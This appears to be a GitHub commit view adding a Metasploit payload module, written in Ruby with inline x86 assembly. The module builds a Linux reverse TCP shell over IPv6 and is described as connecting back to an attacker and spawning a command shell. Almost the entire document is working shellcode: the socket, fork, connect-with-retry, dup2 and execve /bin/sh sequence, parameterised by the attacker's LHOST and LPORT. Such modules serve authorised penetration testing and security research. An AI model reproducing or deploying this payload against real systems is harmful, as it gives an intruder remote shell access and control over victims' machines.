first commit

master
Matteo Malvica 2018-06-13 21:29:09 +02:00 committed by GitHub
parent c094d12c4b
commit e8a7a7e76f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 138 additions and 0 deletions

View File

@ -0,0 +1,138 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 167
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline (IPv6)',
'Description' => 'Connect back to attacker and spawn a command shell over IPv6',
'Author' => 'Matteo Malvica <matteo[at]malvica.com>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix
))
end
def generate_stage
# tcp port conversion
port_order = ([1,0]) # byte ordering
tcp_port = [datastore['LPORT'].to_i].pack('n*').unpack('H*').to_s.scan(/../) # converts user input into integer and unpacked into a string array
tcp_port.pop # removes the first useless / from the array
tcp_port.shift # removes the last useless / from the array
tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.
# ipv6 address conversion
words = IPAddr.new(datastore['LHOST']).hton.scan(/..../).map {|i| i.unpack('V')} # converts user's input into ipv6 hex representation
first = words[0].join(', ') # removes brackets, otherwise will reference to a pointer
second = words[1].join(', ')
third = words[2].join(', ')
fourth = words[3].join(', ')
payload_data =<<-EOS
xor ebx,ebx
mul ebx
push 0x6
push 0x1
push 0xa
mov ecx,esp
mov al,0x66
mov bl,0x1
int 0x80
mov esi,eax
xor eax,eax
mov al,0x2
xor ebx,ebx
int 0x80
cmp eax,ebx
je connect
ja exit
connect:
xor ecx,ecx
xor ebx,ebx
push ebx
push ebx
push #{fourth}
push #{third}
push #{second}
push #{first}
push ebx
push.i16 0x#{tcp_port}
push.i16 0xa
mov ecx, esp
push.i8 0x1c
push ecx
push esi
xor ebx,ebx
xor eax,eax
mov al,0x66
mov bl,0x3
mov ecx,esp
int 0x80
xor ebx,ebx
cmp eax,ebx
jne retry
xor ecx,ecx
mul ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor eax,eax
inc ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor eax,eax
inc ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor edx,edx
mul edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0xb
int 0x80
ret
retry:
xor ebx,ebx
push ebx
push.i8 0xa
mul ebx
mov ebx,esp
mov al,0xa2
int 0x80
jmp connect
ret
exit:
xor eax,eax
mov al,0x1
int 0x80
EOS
Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
end
end